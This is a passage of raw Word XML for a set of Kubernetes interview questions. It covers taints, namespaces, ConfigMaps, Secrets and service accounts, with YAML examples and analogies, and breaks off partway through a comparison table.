        <w:t>No toleration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Blocked</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Taint exists</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Matching toleration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t>1. Dedicated nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU nodes only for ML workloads</w:t>
        <w:br/>
        <w:t>2. System nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only system pods allowed</w:t>
        <w:br/>
        <w:t>3. Isolation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate dev / prod workloads</w:t>
        <w:br/>
        <w:t>4. Critical workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensure important services get reserved nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>Node:</w:t>
        <w:br/>
        <w:t>kubectl taint nodes gpu-node gpu=true:NoSchedule</w:t>
        <w:br/>
        <w:t>Pod:</w:t>
        <w:br/>
        <w:t>tolerations:</w:t>
        <w:br/>
        <w:t>- key: "gpu"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  operator: "Equal"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  value: "true"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  effect: "NoSchedule"</w:t>
        <w:br/>
        <w:t>Only GPU-enabled pods can run there.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concept</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taints repel pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tolerations do not attract pods</w:t>
        <w:br/>
        <w:t>To attract pods, you need:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node affinity or nodeSelector</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Taints vs Node Affinity</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Taints &amp; Tolerations</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Block unwanted pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prefer/require nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node → Pod (repel)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod → Node (select)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Placement control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a club:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taint = “VIP-only entry”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Toleration = “I have VIP pass”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node affinity = “I want to go to this club”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Taints and tolerations in Kubernetes are mechanisms used to control pod scheduling by allowing nodes to repel certain pods using taints, while pods can explicitly declare tolerations to override these restrictions and be scheduled onto those nodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q262. What are namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Namespaces in Kubernetes are a way to logically divide a cluster into isolated virtual environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A namespace is a “virtual cluster inside a cluster” used to organize and isolate resources.</w:t>
        <w:br/>
        <w:t>It helps you group and separate Kubernetes objects like Pods, Services, and Deployments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why namespaces are used</w:t>
        <w:br/>
        <w:t>Namespaces help you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate environments (dev, staging, prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Organize teams or projects</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Control access using RBAC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apply resource quotas per group</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid name conflicts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>You can have:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * dev namespace → development workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * prod namespace → production workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * monitoring namespace → observability tools</w:t>
        <w:br/>
        <w:t>Same service name can exist in different namespaces:</w:t>
        <w:br/>
        <w:t>nginx.dev</w:t>
        <w:br/>
        <w:t>nginx.prod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Every Kubernetes resource belongs to a namespace (unless it’s cluster-wide)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resources are isolated logically, not physically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You must specify namespace when querying resources:</w:t>
        <w:br/>
        <w:t>kubectl get pods -n dev</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Default namespaces in Kubernetes</w:t>
        <w:br/>
        <w:t>1. default</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Where resources go if no namespace is specified</w:t>
        <w:br/>
        <w:t>2. kube-system</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * System components (DNS, scheduler, controller-manager)</w:t>
        <w:br/>
        <w:t>3. kube-public</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Publicly readable resources</w:t>
        <w:br/>
        <w:t>4. kube-node-lease</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node heartbeat information</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is isolated in namespaces?</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ConfigMaps</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Secrets</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is NOT isolated?</w:t>
        <w:br/>
        <w:t>Some resources are cluster-wide:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PersistentVolumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ClusterRoles</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CustomResourceDefinitions (CRDs)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example namespace YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Namespace</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: dev</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Resource control with namespaces</w:t>
        <w:br/>
        <w:t>You can apply:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ResourceQuotas (CPU/memory limits per namespace)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NetworkPolicies (traffic isolation)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RBAC rules (access control per namespace)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Namespace vs cluster</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Logical isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Physical infrastructure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Soft isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Hard isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multi-team sharing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate environments</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a Kubernetes cluster as a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster = building</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Namespaces = different floors or departments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = rooms inside those departments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A namespace in Kubernetes is a logical partition within a cluster that allows multiple virtual environments to coexist by isolating and organizing resources such as pods, services, and deployments for better management, access control, and resource allocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q263. Explain ConfigMaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A ConfigMap in Kubernetes is a resource used to store non-sensitive configuration data separately from application code and container images.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>ConfigMap lets you externalize configuration so Pods can be changed without rebuilding images.</w:t>
        <w:br/>
        <w:t>It is used for key-value configuration data.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why ConfigMaps are used</w:t>
        <w:br/>
        <w:t>Without ConfigMap:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configuration is hardcoded in the image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Any change requires rebuilding and redeploying</w:t>
        <w:br/>
        <w:t>With ConfigMap:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configuration is external</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You can update config without changing the application image</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What ConfigMap stores</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configuration files</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Command-line arguments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Application settings</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>APP_MODE=production</w:t>
        <w:br/>
        <w:t>LOG_LEVEL=info</w:t>
        <w:br/>
        <w:t>DB_HOST=mysql-service</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ways to use ConfigMap</w:t>
        <w:br/>
        <w:t>1. Environment variables</w:t>
        <w:br/>
        <w:t>env:</w:t>
        <w:br/>
        <w:t>- name: APP_MODE</w:t>
        <w:br/>
        <w:t xml:space="preserve">  valueFrom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    configMapKeyRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: app-config</w:t>
        <w:br/>
        <w:t xml:space="preserve">      key: APP_MODE</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Mounted as volume (file-based config)</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t>- name: config-volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">  configMap:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: app-config</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Command-line arguments</w:t>
        <w:br/>
        <w:t>Config values can also be injected into container startup commands.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example ConfigMap YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: ConfigMap</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-config</w:t>
        <w:br/>
        <w:t>data:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  APP_MODE: "production"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  LOG_LEVEL: "debug"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. ConfigMap is created in the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Pod references it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Kubernetes injects data into the container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Application reads config at runtime</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ConfigMap vs Secret</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ConfigMap</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Secret</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Data type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Non-sensitive</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sensitive (passwords, tokens)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Encoding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Plain text</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Base64 encoded</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Not encrypted by default</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More secure handling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Application settings</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature flags</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Environment-specific configs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logging levels</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API endpoints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ConfigMaps are not automatically updated inside running pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods must be restarted or reloaded (unless using volume-based updates with polling)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a ConfigMap as:</w:t>
        <w:br/>
        <w:t>A configuration file stored outside the application, like config.yaml, that can be changed without touching the program.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A ConfigMap in Kubernetes is an API object used to store non-sensitive configuration data in key-value format, allowing applications to decouple configuration from container images and consume it via environment variables, command-line arguments, or mounted configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q264. What are Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secrets in Kubernetes are API objects used to store and manage sensitive information securely, such as passwords, tokens, and keys.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Secrets are like ConfigMaps, but specifically designed for sensitive data.</w:t>
        <w:br/>
        <w:t>They help avoid hardcoding credentials inside container images or code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Secrets are used</w:t>
        <w:br/>
        <w:t>Without Secrets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Passwords/API keys get exposed in code or images</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hard to rotate credentials</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security risk in shared environments</w:t>
        <w:br/>
        <w:t>With Secrets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sensitive data is managed centrally</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Access can be controlled</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier to rotate and update credentials</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Secrets store</w:t>
        <w:br/>
        <w:t>Common examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database passwords</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API tokens</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TLS certificates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SSH keys</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OAuth credentials</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Secrets are stored</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data is stored as Base64 encoded values</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not encrypted by default (encryption at rest must be enabled separately in cluster config)</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>username: YWRtaW4=   # admin</w:t>
        <w:br/>
        <w:t>password: cGFzc3dvcmQ= # password</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Secrets</w:t>
        <w:br/>
        <w:t>1. Opaque (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Generic key-value secrets</w:t>
        <w:br/>
        <w:t>2. docker-registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Credentials for pulling images from private registries</w:t>
        <w:br/>
        <w:t>3. tls</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TLS certificates and private keys</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ways to use Secrets</w:t>
        <w:br/>
        <w:t>1. Environment variables</w:t>
        <w:br/>
        <w:t>env:</w:t>
        <w:br/>
        <w:t>- name: DB_PASSWORD</w:t>
        <w:br/>
        <w:t xml:space="preserve">  valueFrom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    secretKeyRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: db-secret</w:t>
        <w:br/>
        <w:t xml:space="preserve">      key: password</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Mounted as volume (file-based)</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t>- name: secret-volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">  secret:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    secretName: db-secret</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Image pull secrets</w:t>
        <w:br/>
        <w:t>Used to pull images from private registries.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Secret YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Secret</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: db-secret</w:t>
        <w:br/>
        <w:t>type: Opaque</w:t>
        <w:br/>
        <w:t>data:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  username: YWRtaW4=</w:t>
        <w:br/>
        <w:t xml:space="preserve">  password: cGFzc3dvcmQ=</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ConfigMap vs Secret</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ConfigMap</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Secret</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Non-sensitive config</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sensitive data</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Encoding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Plain text</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Base64 encoded</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher (with encryption support)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>log level, env settings</w:t>
        <w:br/>
        <w:tab/>
        <w:t>passwords, API keys</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important security notes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Base64 ≠ encryption (it is just encoding)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable encryption at rest in etcd for real security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use RBAC to restrict access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid exposing secrets in logs or environment dumps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ConfigMap = normal configuration file</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Secret = locked safe containing credentials</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Secret in Kubernetes is an API object used to securely store and manage sensitive information such as passwords, tokens, and certificates, allowing applications to consume them without embedding them directly into code or container images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q265. Explain service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Service Account in Kubernetes is an identity used by applications (Pods) to interact with the Kubernetes API and cluster resources.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Service Accounts are the “machine identity” for workloads running inside Kubernetes.</w:t>
        <w:br/>
        <w:t>While users represent humans, service accounts represent applications and system processes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why service accounts are needed</w:t>
        <w:br/>
        <w:t>Inside a cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods may need to talk to the Kubernetes API</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: read ConfigMaps, list Pods, access Secrets</w:t>
        <w:br/>
        <w:t>Service accounts provide:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Authentication (who are you?)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Authorization (what are you allowed to do?)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. A Service Account is created in a namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Kubernetes generates a token (JWT) for it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. That token is mounted inside Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Pod uses the token to authenticate with the API server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Default service account</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Every namespace has a default service account</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If you don’t specify one, Pods use it automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * It has minimal permissions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Service Account YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: ServiceAccount</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-sa</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: default</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How a Pod uses it</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  serviceAccountName: app-sa</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What service accounts are used for</w:t>
        <w:br/>
        <w:t>1. Accessing Kubernetes API</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * List Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Watch Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Read ConfigMaps/Secrets</w:t>
        <w:br/>
        <w:t>2. Controller operations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Used by controllers like Deployments, Jobs, etc.</w:t>
        <w:br/>
        <w:t>3. CI/CD pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automating deployments inside cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Service Account vs User Account</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service Account</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User Account</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used by</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods / applications</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Humans</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed by</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>External systems (LDAP, OIDC)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster-wide or external</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Authentication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Tokens</w:t>
        <w:br/>
        <w:tab/>
